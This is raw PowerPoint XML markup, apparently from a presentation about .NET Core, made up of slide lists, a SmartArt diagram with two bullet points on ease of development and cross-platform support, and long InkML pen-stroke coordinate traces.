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622" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="266" r:id="rId6"/>
    <p:sldId id="270" r:id="rId7"/>
    <p:sldId id="272" r:id="rId8"/>
    <p:sldId id="275" r:id="rId9"/>
    <p:sldId id="607" r:id="rId10"/>
    <p:sldId id="611" r:id="rId11"/>
    <p:sldId id="612" r:id="rId12"/>
    <p:sldId id="613" r:id="rId13"/>
    <p:sldId id="274" r:id="rId14"/>
    <p:sldId id="608" r:id="rId15"/>
    <p:sldId id="616" r:id="rId16"/>
    <p:sldId id="609" r:id="rId17"/>
    <p:sldId id="615" r:id="rId18"/>
    <p:sldId id="610" r:id="rId19"/>
    <p:sldId id="614" r:id="rId20"/>
    <p:sldId id="259" r:id="rId21"/>
    <p:sldId id="261" r:id="rId22"/>
    <p:sldId id="262" r:id="rId23"/>
    <p:sldId id="271" r:id="rId24"/>
    <p:sldId id="268" r:id="rId25"/>
    <p:sldId id="618" r:id="rId26"/>
    <p:sldId id="619" r:id="rId27"/>
    <p:sldId id="620" r:id="rId28"/>
    <p:sldId id="269" r:id="rId2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95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3D108D-6720-978C-768B-C244B7CA6E67}" v="65" dt="2020-08-21T21:08:41.742"/>
    <p1510:client id="{755E8215-E9E0-4F21-822D-6A6264F849DD}" v="53" dt="2020-08-22T10:54:12.078"/>
    <p1510:client id="{C1F85AD1-9A74-7547-BD85-04AAD07BA4E4}" v="1609" dt="2020-08-22T18:53:49.064"/>
    <p1510:client id="{FF23365B-EC4C-045F-EDAE-011F460ADD89}" v="171" dt="2020-08-22T09:39:26.07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60"/>
    <p:restoredTop sz="94678"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="85" d="100"/>
          <a:sy n="85" d="100"/>
        </p:scale>
        <p:origin x="192" y="592"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="395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5DAB0A-451D-41F3-AD6B-8DA8487FB516}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2016/7/layout/BasicProcessNew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E303905-04BD-4696-98A9-7683F6A01383}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-NL"/>
            <a:t>Easy to develop and write</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1354BA46-0400-4392-872A-9FE2094D1BAB}" type="parTrans" cxnId="{DDB84DB0-8B56-4100-A741-411E73618630}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4DC2CEFF-E90D-485A-A635-CE3EC9D9C1F0}" type="sibTrans" cxnId="{DDB84DB0-8B56-4100-A741-411E73618630}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA7335AB-4668-4DEE-8609-1206A1142B6E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-NL"/>
            <a:t>.Net core is a cross platform </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-NL">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:rPr>
            <a:t></a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-NL"/>
            <a:t> runs everywhere  </a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7693B0F-D05C-46BA-9B11-A53C85D25E50}" type="parTrans" cxnId="{D0A14702-9761-44CC-B35C-93F2FF5B5B2E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F91A800D-B57C-45A7-921D-381CF3786674}" type="sibTrans" cxnId="{D0A14702-9761-44CC-B35C-93F2FF5B5B2E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{58A55697-BD5A-E444-B973-95289092492C}" type="pres">
      <dgm:prSet presAssocID="{755DAB0A-451D-41F3-AD6B-8DA8487FB516}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{72EAA8E7-949C-7942-BA45-7235D201DB00}" type="pres">
      <dgm:prSet presAssocID="{8E303905-04BD-4696-98A9-7683F6A01383}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{363ED1DB-7C6C-D04C-8B47-E7C8705D050D}" type="pres">
      <dgm:prSet presAssocID="{4DC2CEFF-E90D-485A-A635-CE3EC9D9C1F0}" presName="sibTransSpacerBeforeConnector" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1C254A07-706C-0142-BEE1-BA997AAC11A1}" type="pres">
      <dgm:prSet presAssocID="{4DC2CEFF-E90D-485A-A635-CE3EC9D9C1F0}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9F65C01C-A2DC-9B47-9FF3-2E78C2EA0D58}" type="pres">
      <dgm:prSet presAssocID="{4DC2CEFF-E90D-485A-A635-CE3EC9D9C1F0}" presName="sibTransSpacerAfterConnector" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0BC98D4D-A773-144D-9EC7-97E39567A504}" type="pres">
      <dgm:prSet presAssocID="{DA7335AB-4668-4DEE-8609-1206A1142B6E}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{D0A14702-9761-44CC-B35C-93F2FF5B5B2E}" srcId="{755DAB0A-451D-41F3-AD6B-8DA8487FB516}" destId="{DA7335AB-4668-4DEE-8609-1206A1142B6E}" srcOrd="1" destOrd="0" parTransId="{E7693B0F-D05C-46BA-9B11-A53C85D25E50}" sibTransId="{F91A800D-B57C-45A7-921D-381CF3786674}"/>
    <dgm:cxn modelId="{43702704-2469-DC45-A2BE-DF98A21DFB18}" type="presOf" srcId="{DA7335AB-4668-4DEE-8609-1206A1142B6E}" destId="{0BC98D4D-A773-144D-9EC7-97E39567A504}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/BasicProcessNew"/>
    <dgm:cxn modelId="{A1E6BF88-2564-C740-BD39-121B68C3DEFD}" type="presOf" srcId="{755DAB0A-451D-41F3-AD6B-8DA8487FB516}" destId="{58A55697-BD5A-E444-B973-95289092492C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/BasicProcessNew"/>
    <dgm:cxn modelId="{DDB84DB0-8B56-4100-A741-411E73618630}" srcId="{755DAB0A-451D-41F3-AD6B-8DA8487FB516}" destId="{8E303905-04BD-4696-98A9-7683F6A01383}" srcOrd="0" destOrd="0" parTransId="{1354BA46-0400-4392-872A-9FE2094D1BAB}" sibTransId="{4DC2CEFF-E90D-485A-A635-CE3EC9D9C1F0}"/>
    <dgm:cxn modelId="{1949C8D1-95EE-E64D-B97D-A4DCE70A1F7E}" type="presOf" srcId="{4DC2CEFF-E90D-485A-A635-CE3EC9D9C1F0}" destId="{1C254A07-706C-0142-BEE1-BA997AAC11A1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/BasicProcessNew"/>
    <dgm:cxn modelId="{81E3EEDD-9C53-484D-B8AF-13D28015566F}" type="presOf" srcId="{8E303905-04BD-4696-98A9-7683F6A01383}" destId="{72EAA8E7-949C-7942-BA45-7235D201DB00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/BasicProcessNew"/>
    <dgm:cxn modelId="{12319543-1A23-7644-A145-5BCB17FB6AC3}" type="presParOf" srcId="{58A55697-BD5A-E444-B973-95289092492C}" destId="{72EAA8E7-949C-7942-BA45-7235D201DB00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/BasicProcessNew"/>
    <dgm:cxn modelId="{9542FC02-7534-D141-8F67-FBD812811E89}" type="presParOf" srcId="{58A55697-BD5A-E444-B973-95289092492C}" destId="{363ED1DB-7C6C-D04C-8B47-E7C8705D050D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/BasicProcessNew"/>
    <dgm:cxn modelId="{B8D092CD-7991-0E46-9F6C-15FB6578019A}" type="presParOf" srcId="{58A55697-BD5A-E444-B973-95289092492C}" destId="{1C254A07-706C-0142-BEE1-BA997AAC11A1}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/BasicProcessNew"/>
    <dgm:cxn modelId="{7EA3DE2F-00BB-8942-895C-00A18F95FAF4}" type="presParOf" srcId="{58A55697-BD5A-E444-B973-95289092492C}" destId="{9F65C01C-A2DC-9B47-9FF3-2E78C2EA0D58}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/BasicProcessNew"/>
    <dgm:cxn modelId="{1A686DAE-4597-524F-A64E-9757CD24E438}" type="presParOf" srcId="{58A55697-BD5A-E444-B973-95289092492C}" destId="{0BC98D4D-A773-144D-9EC7-97E39567A504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AA8E7-949C-7942-BA45-7235D201DB00}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="559" y="729260"/>
          <a:ext cx="4821361" cy="289281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5100" kern="1200"/>
            <a:t>Easy to develop and write</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="5100" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="559" y="729260"/>
        <a:ext cx="4821361" cy="2892816"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1C254A07-706C-0142-BEE1-BA997AAC11A1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4896197" y="2054169"/>
          <a:ext cx="723204" cy="243000"/>
        </a:xfrm>
        <a:prstGeom prst="rightArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 50000"/>
            <a:gd name="adj2" fmla="val 50000"/>
          </a:avLst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C98D4D-A773-144D-9EC7-97E39567A504}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5693678" y="729260"/>
          <a:ext cx="4821361" cy="2892816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NL" sz="5100" kern="1200"/>
            <a:t>.Net core is a cross platform </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-NL" sz="5100" kern="1200">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:rPr>
            <a:t></a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-NL" sz="5100" kern="1200"/>
            <a:t> runs everywhere  </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="5100" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5693678" y="729260"/>
        <a:ext cx="4821361" cy="28928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2T17:43:48.9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15009 8284 24575,'0'22'0,"0"1"0,0 10 0,4 10 0,8-3 0,4 14 0,10-4 0,-8-4 0,9 7 0,-9-8 0,8 6 0,-7-3 0,6-8 0,-7-3 0,3 2 0,2 8 0,0-5 0,1 5 0,-3-14 0,-5-1 0,4 1 0,-3 0 0,4 0 0,1 5 0,-4-9 0,0 0 0,-8-12 0,0 0 0,-3-7 0,2 6 0,-3-9 0,1 5 0,-1-2 0,1 4 0,0-1 0,-1 0 0,5 5 0,-4-4 0,7 7 0,-6-6 0,5 2 0,-6-4 0,3 1 0,-3-1 0,-1-3 0,1 3 0,-1-3 0,0 0 0,1 2 0,-1-1 0,1 2 0,0 0 0,3 7 0,-3-9 0,2 8 0,-3-12 0,4 8 0,-3-7 0,-1 4 0,-1-9 0,-4 2 0,4-4 0,-1 2 0,2-3 0,2 0 0,-1-3 0,2-4 0,-3-3 0,5-7 0,-4 2 0,4-6 0,-1 3 0,-2-4 0,3 3 0,-4-2 0,0 3 0,0-4 0,-3 0 0,-1 0 0,-3 3 0,0 2 0,0 3 0,0 4 0,0 1 0,0 3 0,0 5 0,-2 4 0,-2 7 0,-5-1 0,1 4 0,-2-6 0,4 6 0,-4-3 0,3 0 0,-6 7 0,2-6 0,0 10 0,-7-2 0,6-1 0,-6 4 0,3-4 0,1 5 0,-1-1 0,4-4 0,-3 3 0,3-10 0,-3 6 0,0-7 0,1 4 0,0-4 0,-1 0 0,-3-3 0,2 2 0,-6-1 0,3 2 0,-4-5 0,-5-2 0,4-3 0,-8 0 0,3 0 0,-4 0 0,4-7 0,-4-6 0,4-4 0,-7-8 0,6 5 0,1-5 0,4 5 0,1 1 0,5 4 0,0-2 0,7 2 0,-2-2 0,6 3 0,0 4 0,1-3 0,5 6 0,-5-2 0,6 3 0,-3 0 0,3 0 0,0-3 0,0-5 0,0-9 0,0-4 0,0 9 0,0 3 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="18585">11548 5465 24575,'-3'-2'0,"1"7"0,2 9 0,0 40 0,4 1 0,6 1 0,4 4 0,0-11 0,3 0-1211,6 11 0,2 1 1211,-1-5 0,-1-2 0,0-3 0,-1-1-722,-3-6 0,0 0 722,6 3 0,-1-1 0,-8-9 0,1-2-496,6 6 1,1-1 495,-6-4 0,1 1 0,5 3 0,0 1 0,1-3 0,-1 0-625,2 9 1,-1 0 624,0-6 0,-2 0 0,-5-6 0,0 0 637,5 3 0,0-1-637,7 18 0,-10-23 0,0 1 0,8 24 1159,-1-8-1159,-6-11 1067,-4-1-1067,-2-5 1553,2 5-1553,-3-6 0,2 2 0,17 18-88,-15-15 1,1 2 87,0-7 0,1-2 0,8 19-173,-8-16 1,0 0 172,8 15 0,10 7 0,-4 2 0,-12-24 0,0-2 0,13 21 0,-16-21 0,0-2 0,7 7 0,-1 4 0,1-5 0,0 1 0,-4-1 969,2-5-969,-8-2 604,2-8-604,-7-2 0,2-3 0,0 5 0,2-4 0,2 8 0,-4-9 0,1 3 0,0 1 0,0-4 0,0 3 0,-1-3 0,0-1 0,-2 1 0,-2-4 0,1 2 0,-3-5 0,2 3 0,0 5 0,13 5 0,-5 2 0,8 0 0,-7-3 0,-3-5 0,8 9 0,-4-4 0,0 1 0,4 3 0,-8-9 0,3 4 0,-4-4 0,-4-1 0,3-2 0,-6-2 0,2-3 0,-3 0 0,0 0 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,2 2 0,-1-1 0,2 2 0,-3-3 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 4 0,-1-3 0,3 2 0,-2 1 0,3-3 0,-1 5 0,2 5 0,7 3 0,-3 9 0,9 5 0,-5-6 0,1 3 0,1 4 0,1 0 0,3 1 0,1-1-213,-3-1 0,0-1 213,9 8 0,-2-6 0,-5-6 0,-1-5 0,-1-7 0,-4 0 0,2-5 426,-6-2-426,2 0 0,-4-3 0,1 0 0,-1 0 0,1-1 0,-4 1 0,-1-4 0,-3 3 0,0-6 0,0 3 0,0-3 0,-3-2 0,0-1 0,-3-3 0,0-3 0,0 4 0,0-1 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="28185">14854 9904 24575,'-7'4'0,"1"9"0,6 17 0,0 21 0,0 0 0,0 5-1209,0-8 1,0 0 1208,0 13 0,0 1 0,0-4 0,0-1-815,0-3 0,0 0 815,0 10 0,0 2 0,0-20 0,0 0 0,0-1 0,0 9 0,0-2-247,1-5 1,2-4 246,9 19 0,6-27 0,3-3 0,19 14 0,-7-18 0,2-5 0,-3-9 0,3-5-916,18-5 0,5-3 916,0 2 0,1-1 0,3-2 0,0 0 0,-15 0 0,1 1 0,-1-2-368,16-1 1,1-2 367,-15 1 0,2-2 0,-1 0 0,-3 0 0,0-2 0,-2 0 0,4-1 0,2-2 0,3-3 0,5-3 0,-6 1 0,-11 3 0,-1-1 184,5-4 1,4-1-1,-5 0-184,-9 2 0,-3 1 215,-6-3 0,1-2-215,17-8 0,-1-2 0,-15 6 0,-2 0 932,15-8 1,2 0-933,-2-2 0,-2 1 0,-7 10 0,1 1 771,3-6 1,0 0-772,-8 9 0,-1 0 793,6-5 0,1-2-793,7-4 0,2-1 0,2-2 0,0 0 0,0-2 0,-1 1-399,-9 7 1,-3 1 398,-3 3 0,-2 1 0,24-20 0,-24 21 0,-1-1 0,18-17 0,-18 18 0,0 0 0,3-8 0,0-1 1082,-3-4-1082,-8 7 0,1-6 0,-13 12 845,0 0-845,-1 1 0,-6 7 0,3-1 0,-3-3 0,0-2 0,0-3 0,0-4 0,0-12 0,-11 2 0,-4-12 0,-21 1-683,14 20 0,-2-1 683,-4-6 0,-3-1 0,-8-1 0,-1-2-1142,-1-3 1,-1 0 1141,-5 2 0,-2 0 0,2-3 0,-1 2 0,-3 5 0,1 2 0,2-3 0,1 3-756,-1 6 1,0 2 755,1 2 0,-1 1 0,2 2 0,-2 2 0,-6 2 0,-2 3-917,-4 0 0,0 2 917,-1 2 0,0 1 0,16 3 0,-1 1 0,0 0 0,-18 0 0,-2 1 0,6 1 0,-3 0 0,3 1 0,12 0 0,2 2 0,-2-1 0,-7 0 0,-1 0 0,2 0 0,-6 0 0,3 0 0,1-1 0,0 2 0,-3 0 0,-1 3 0,0 4 0,0 1 0,0 0 0,1 2 0,-1 6 0,0 1 0,4-4 0,1 1 0,-5 3 0,2 0 104,19-5 0,1 1-104,-11 2 0,2-1 0,-12 5 0,24-7 0,0-1 1643,-27 7-1643,11-1 0,2 0 0,11-1 1512,1-1-1512,9 0 2292,6-2-2292,-1 5 1055,8-1-1055,-4 5 284,5-1-284,2 0 0,1 5 0,4-4 0,2 8 0,2-8 0,3 8 0,0 1 0,0 2 0,0 3 0,8 0 0,1-4 0,11 5 0,-2-5 0,1-5 0,2 4 0,-6-8 0,5 3 0,-2-8 0,-2 2 0,5-5 0,-2 2 0,4 1 0,3-3 0,3 4 0,15 6 0,-13-11 0,17 15 0,-19-17 0,8 8 0,-5-9 0,-4 0 0,-2-2 0,-7-2 0,-5 2 0,-5-3 0,-3-4 0,0 0 0,0-3 0,-3 2 0,0 2 0,0-1 0,-3 2 0,3-7 0,-12-11 0,3 1 0,-14-15 0,3 8 0,4 5 0,2 4 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="30625">14589 10510 24575,'-18'0'0,"-4"0"0,-20 0 0,-6 0 0,10 0 0,-4 0-1570,-10 0 1,-6 0 0,4 0 1569,5 0 0,-1 0 0,-1 0 0,-9 0 0,0 0 0,6 0 0,-12 0 0,0 0-717,16 0 0,-6 0 0,0 0 0,4 0 717,-3 0 0,4 0 0,0 0 0,1 0 0,1 0 0,-3 0 0,4 0 0,-4 0 0,0 0 0,3 0 0,-2 0 0,1 0 0,-1 0 0,-10 0 0,-2 0 0,5 0-1,0 0 1,3 0 0,-8 0 0,2 0 0,15 0 0,1 0-332,-10 0 1,1 0 331,18 0 0,0 0 0,-14 2 0,3 1 0,-11 2 0,3 1 0,-1 0 0,-8 3 0,15-3 0,-1 0 0,14 1 0,1 0 0,-7-2 0,0 2 0,6 2 0,1 0 0,-7-3 0,0 0 0,2 4 0,2 0 0,-24 0 0,17-2 0,-4 0 0,-6 1 0,1-1 0,5-1 0,-1-1 0,2-1 0,-3 0 0,7-2 0,-20 2 0,20-5 0,1 0 0,-8 0 1707,-3 0-1707,-5 0 0,7 0 0,-1 0 3360,6 0-3360,3 0 2120,4 0-2120,7 0 1053,12 0-1053,7 0 0,-10 0 0,9 0 0,-4 0 0,5 0 0,-3 0 0,3 0 0,-8 0 0,8 0 0,-7 0 0,6 0 0,-6 0 0,10 0 0,-12 0 0,15 0 0,-11 0 0,4 0 0,3 0 0,-3 0 0,6 0 0,0 0 0,0 0 0,2 0 0,5 0 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="33507">6879 5993 24575,'-7'8'0,"1"13"0,6 6 0,-4 15 0,-9-4 0,2 11 0,-9-4 0,5 16 0,-8-9 0,2-6 0,-1 3 0,8-14 0,-1 0-469,-8 10 1,0 0 468,8-12 0,0-2 0,-14 26 0,11-25 0,2-1-445,-3 12 445,-1-7 0,0 2 0,-5 21 0,-2-13 0,1 2 0,10-13 0,2-1 0,-4 1 0,2-2 0,-4 20 915,6-17-915,-1 23 467,7-32-467,0 18 0,0-17 0,4 4 0,-3 24 0,6-13-299,-1-3 1,0 1 298,2 13 0,0-20 0,0 1 0,0 27 0,0-28 0,0 2 0,0-1 0,0 1 0,0 28 0,0-23 0,0-1 0,0-5 0,0-1 0,0 0 0,0 1 0,0 1 0,0 0 0,0-2 0,0-1 0,0 23 0,0-20 0,0 1 0,0 1 0,0 0 0,-4 25 0,-3-16 0,-1 8 0,-1-6 0,0-9 0,-1-2-600,-6 24 0,-1-1 600,5-25 0,0-4 0,-8 26 0,6-24 0,-1 0 0,-9 24 0,9-24 0,0 0 0,-13 23 0,5-12 0,-1-1 0,-7 9 0,6-14 0,0-2 0,-3 3 0,9-14 0,7-7 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="36811">7516 11485 24575,'-38'-3'0,"5"-3"0,-5-2 0,-15 0 0,-8-3-2458,8-4 0,-6-4 1,-3-2-1,2 3 2244,4 2 0,2 2 0,-2 0 0,-4-3-198,8 0 1,-4-2-1,-2-1 1,0 0-1,0 1 1,1 1 411,-6 0 0,1 2 0,0 1 0,-1-1 0,-1 0-165,5 0 0,-2-2 0,0 1 0,-1 0 0,-1 0 0,1 2 165,-1 0 0,0 2 0,0 0 0,-1 1 0,-3 0 0,-3 0-210,13 2 0,-2 1 0,-2 0 0,-2 0 1,-1 1-1,0-1 0,0 1 0,0 0 0,2 1 1,2 0 209,-6 0 0,2 1 0,1 0 0,0 0 0,1 1 0,-2 0 0,-1 0 0,-2 1-14,5-1 0,-2 1 0,-1 0 0,-1 0 0,-1 0 0,0 0 0,0 1 0,1-1 0,0 2 0,2-1 14,-4 1 0,1 0 0,0 1 0,0 0 0,1 0 0,1 0 0,0 1 0,1-1 0,1 1 0,0-1 0,2 1 0,1 0 0,1-1 0,0 1 0,-1 1 0,0-1 0,-2 1 0,3 0 0,-2 0 0,0 0 0,-1 0 0,0 1 0,1 0 0,0 1 0,1 0 0,2 0 0,-7 2 0,2 0 0,0 0 0,1 2 0,1-1 0,1 1 0,2 1 0,-2 0 0,3 0 0,0 0 0,1 1 0,1 1 0,-1 2 210,-1 0 1,0 2 0,0 1 0,0 1 0,3-1 0,2 1-211,-8 3 0,2 0 0,3 0 0,1 2 0,6 0 0,1 1 0,3 0 0,3 0 0,-19 9 0,10 1 0,13 1 0,10 4 1303,17 0 0,5 5-1303,-4 20 0,5 4 0,9-5 0,5 0 917,-5-17 0,0 1 0,3-2-917,7 8 0,3-2 0,2 1 0,-1-1 0,-3-6 0,2 2 0,0 0 0,2 2 0,-1-5 0,-2-4 0,0-1 0,7 11 0,4 5 0,-1-6 0,-2-8 0,3-2 977,6 10 1,4 5-1,-2-5-977,0-6 0,1 0 0,-1 1 0,3 3 0,-1-1 0,-6-9 0,-1-1 0,2 1 0,5 4 0,3 2 0,2 3 0,0 0 0,2 3 0,1 0 0,-2-3 0,4 2 0,-2-2 0,1 1-234,-5-4 0,0 1 0,0 0 0,-3-3 234,-4-1 0,-2-3 0,0-1 0,0-2 0,-1-2 0,0 1-643,9 13 1,1-1 642,1-5 0,0 0 0,-6 1 0,-1-1 0,3-3 0,0-1 114,-2 2 1,-1-1-115,-2-5 0,3 0 0,-3-2 0,4 1 0,-3-3 0,4 1 0,-1-1 0,11 7 0,1-2 0,-14-11 0,-2-4 1014,1-5 1,1-2-1015,14 2 0,3-3 0,-8-4 0,0-2 1061,7 1 1,-1-2-1062,-9-2 0,-1-3 0,-5-2 0,0-2 0,3-4 0,0-3 0,-5-2 0,-2-2 0,5-4 0,-1-1 0,-2 1 0,-1-1 0,9-6 0,0-1-268,0-3 0,1-1 268,8-4 0,2-2-504,-6 5 0,2-1 0,-2 2 504,6-4 0,0 0 0,-3 3 0,4-1 0,-4 2 0,4-3 0,-2 1 0,-10 9 0,2 0 0,-1 0 0,0 0 0,0 0 0,0 0-496,-3 3 0,-1 0 1,0 1 495,16-10 0,-3 2-18,-12 7 1,-3 0 17,3-1 0,-2 1 0,-8 7 0,0-1 0,4-3 0,0-2 710,6 2 0,-1 2-710,12-15 2860,2 10-2860,-29 9 2001,-7 9-2001,-7 1 1204,3 2-1204,-7 1 755,4 3-755,-7-2 0,-1-5 0,-5-3 0,-3-3 0,-10-5 0,-2 2 0,5 4 0,3 5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8-22T17:44:36.5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1377 2622 24575,'13'0'0,"6"0"0,13 0 0,32 0 0,-20 2 0,4 2-3041,10 3 1,6 4 3040,-9-2 0,6 2 0,2 0 0,0 1-777,-11-3 0,0 1 1,1 0-1,1 0 1,3 0 776,-4-1 0,2 1 0,2 0 0,1-1 0,1 1 0,1-1 0,-1 0-498,2 0 0,1 0 1,-1 0-1,2 0 1,0-1-1,1 0 0,1 0 498,-1-2 0,1 0 0,1-1 0,0 1 0,1-1 0,0 0 0,1 0 0,-1 0-259,-6 1 0,0 0 0,0 0 1,0 0-1,0 0 0,1 0 0,0 0 1,1-1-1,1-1 259,-2 0 0,1-1 0,1 0 0,0-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1 0-61,-2 1 0,0 0 1,0 0-1,1 1 0,-1 0 1,0 0-1,0 0 1,0-1-1,0 0 0,0 0 61,1-1 0,0 0 0,1 0 0,-1 0 0,1-1 0,-1 0 0,-1 1 0,-1-1 0,-1 0 0,-1 1 0,2 0 0,-1 0 0,-2 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,1 0 0,6-1 0,1 1 0,2 0 0,-1-1 0,0 1 0,-1-1 0,-2 0 0,-3 0 0,3 0 0,-4 0 0,-2 0 0,1-1 0,0 1 0,3 0 0,-6 1 0,1-1 0,1 1 0,1-1 0,1 1 0,-1 0 0,-1-1 0,-2 1 69,2 0 0,-1-1 1,-2 1-1,1 0 0,0 0 1,1-1-1,1 1-69,1-1 0,3 1 0,1-1 0,0 0 0,0 0 0,-1 0 0,-2 1 0,-3 0 0,3 0 0,-3 1 0,-2 1 0,0-1 0,1 0 0,2 0 0,1-1 0,3-1 0,1 0 0,1 1 0,-2-1 0,-4 1 0,-3 1 0,11 2 0,-6 2 0,-2 0 0,-1-1 178,-6-2 1,-1-2 0,-1 1 0,0 0-179,4 3 0,1 0 0,-1 1 0,-1-2 0,8 0 0,-2-2 0,1 2 0,-7 0 0,2 2 0,1-1 0,-2 0 0,-3-2 0,-1-2 0,1 1 0,2 0 0,0 1 0,2 1 0,2 0 0,-2-1 0,-3 0 0,13-1 0,-3-2 0,2 1 0,-4 0 0,2 1 0,0-1 0,-6-1 515,-3-1 1,-5-1-1,-1-1-515,18 1 0,0 0 633,-8 0 0,2 0 1,-1 0-634,-10 0 0,-1 0 0,0 0 0,4 0 0,1 0 0,-3 0 0,6 0 0,-5 0 0,-10 0 0,-3 0 0,21 0 4330,2 0-4330,-6 0 0,-12 0 3834,-1-3-3834,-23-4 2663,0-7-2663,-4-5 911,3-18-911,-5 2 0,2-26-998,-5 3 998,-6 17 0,0-2-1317,-1 0 0,0-2 1317,-1-5 0,-1-5 0,-1 2 0,0 5 0,-1 2 0,-1-2 0,-1-6 0,-1-1 0,-2 0 0,-3 0 0,-1 1 0,-3 1-889,1 7 1,-3 2-1,1-1 889,-2-7 0,0-1 0,-2-2 0,-1 4 0,-2-1 0,-1-1 0,2 3 0,-1-3 0,1 2 0,-2-1 0,0 6 0,-2-1 0,0 1 0,2 2 0,-1-2 0,1 2 0,-1 1 0,-1 6 0,-1 0 0,-3-1 0,-8-12 0,-4-3 0,-2 3-1183,2 6 0,-2 2 0,-3-2 1183,4 3 0,-2-2 0,-1 0 0,-1 3 0,2 4 0,0 2 0,-2 1 0,0-1-684,-3-2 0,-1-2 0,-1 